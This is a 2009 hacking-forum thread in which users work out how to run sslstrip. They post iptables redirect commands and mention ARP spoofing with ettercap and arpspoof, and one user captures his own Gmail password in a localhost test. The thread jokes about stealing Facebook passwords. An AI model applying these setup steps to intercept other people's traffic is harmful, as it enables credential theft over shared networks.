Jump to content


Photo
- - - - -

SSLStrip


  • Please log in to reply
10 replies to this topic

#1 phr34kc0der

phr34kc0der

    SUPR3M3 31337 Mack Daddy P1MP

  • Members
  • 469 posts
  • Country:
  • Gender:Male

Posted 24 February 2009 - 06:48 PM

Im sure most of you have read about sslstrip. I was trying to play with it earlier but well, my iptables skills are very lacking. I understand that the documentation was probably on the sparse side for a reason (keep script kiddies away) but if someone can give me some pointers i'd be grateful.

And please dont point me to google. I do plan on playing with iptables in depth but at a later date. ATM im interested in wifi attacks and want to play with a few before moving on.

BTW, i could not find any blog posts, guides or tutorials. If someone wrote one it would probably get to the top of google quite quickly (although you would have to deal with the guilt of helping skiddies steal facebook passwords :P)

#2 Ohm

Ohm

    I could have written a book with all of these posts

  • Members
  • 3,209 posts
  • Gender:Male
  • Location:Maine, USA

Posted 24 February 2009 - 10:52 PM

After a very confusing mistake, I've gotten this running.

I'm doing something a little different. I just want to try this on localhost, so I'm not doing any ARP spoofing. Instead, I'm just forwarding requests to port 80 to port 10000. Of course, this created a very confusing error. My test curl request was redirected to port 10000, and sslstrip got it. It then tried to connect to the server on port 80, which was then redirected to itself. It sat there making new threads until it dies. I was debugging python before I realized what was going on.

Anyway, here's my iptables command line.

sudo iptables -t nat -A OUTPUT -p tcp -m owner --uid-owner test --destination-port 80 -j REDIRECT --to-port 10000

The easiest way was to just make a user called test and filter only connection requests made by the test user.

I'm about to play with this further, I haven't even begun to start doing any ssl testing.

#3 Ohm

Ohm

    I could have written a book with all of these posts

  • Members
  • 3,209 posts
  • Gender:Male
  • Location:Maine, USA

Posted 24 February 2009 - 11:05 PM

And it is working. Running firefox as the test user (using the ssh trick), I just captured my own gmail password.

ssh test@localhost firefox


#4 phr34kc0der

phr34kc0der

    SUPR3M3 31337 Mack Daddy P1MP

  • Members
  • 469 posts
  • Country:
  • Gender:Male

Posted 25 February 2009 - 01:27 PM

Thanks Ohm. Havent had a chance to play some more but i will do.

#5 Cryptik Hex

Cryptik Hex

    elite

  • Members
  • 101 posts
  • Location:Pasadena CA

Posted 25 February 2009 - 10:38 PM

This sounds interesting! Thanks for letting me in on this (surprised I hadn't heard about it) but yea I'm definitely going to learn more about the inner workings :D

#6 Ohm

Ohm

    I could have written a book with all of these posts

  • Members
  • 3,209 posts
  • Gender:Male
  • Location:Maine, USA

Posted 26 February 2009 - 12:38 AM

Oops, I made a mistake in the ssh thing.

ssh -X test@localhost firefox

This is still not perfect. My previous advice of opening up https://gmail.google.com/ still protects you (but only on gmail). This relies on having cleartext HTTP to mangle URLs to HTTPS form submissions. If the connection was initiated as HTTPS to begin with, there's nothing it can do.

#7 phr34kc0der

phr34kc0der

    SUPR3M3 31337 Mack Daddy P1MP

  • Members
  • 469 posts
  • Country:
  • Gender:Male

Posted 26 February 2009 - 01:30 PM

It seems version 0.2 has been released (not sure which version you were using Ohm). This one has a MUCH better readme.

#8 Ohm

Ohm

    I could have written a book with all of these posts

  • Members
  • 3,209 posts
  • Gender:Male
  • Location:Maine, USA

Posted 26 February 2009 - 09:07 PM

I was using 0.1, but I'm done playing with it now. I figured it out myself anyway :P

#9 duper

duper

    Dangerous free thinker

  • Members
  • 816 posts
  • Location:NYC

Posted 03 March 2009 - 01:32 PM

http://djtechnocrat....acked-then.html

Didn't know the author was forced to release because they got hacked.. How ironic.

#10 Ohm

Ohm

    I could have written a book with all of these posts

  • Members
  • 3,209 posts
  • Gender:Male
  • Location:Maine, USA

Posted 08 March 2009 - 07:29 PM

They make it sound like it was some epic hack or the URL was "sniffed" while he accessed it or something. Someone just guessed the URL is all.

Also, I got this running with ettercap with no problems at all. In all it only took me about 5 minutes, including figuring out how to use ettercap (which I'd never used before :P). The iptables command was definitely easier as well, since I didn't have to weed out unwanted traffic from my own computer.

iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 10000


#11 SUMMERZFUN

SUMMERZFUN

    the 0ne

  • Members
  • 1 posts

Posted 25 March 2009 - 12:39 AM

Hi
Trying this on mac, I tried using the ipfw command (as osx doesn't support iptables). My ipfw add fwd 127.0.0.1,80 tcp from any to any 10000. If anyone is familiar with ipfw in osx, could you please advise? I think this must be the issue, as I got arpspoof working (downloaded macports and dsniff), also the kernel sysctl forwarding to 1, and this was the remaining step.
Nothing also contained in the secret file as my other laptop I signed onto yahoo.

Thank you very much for any osx information.




BinRev is hosted by the great people at Lunarpages!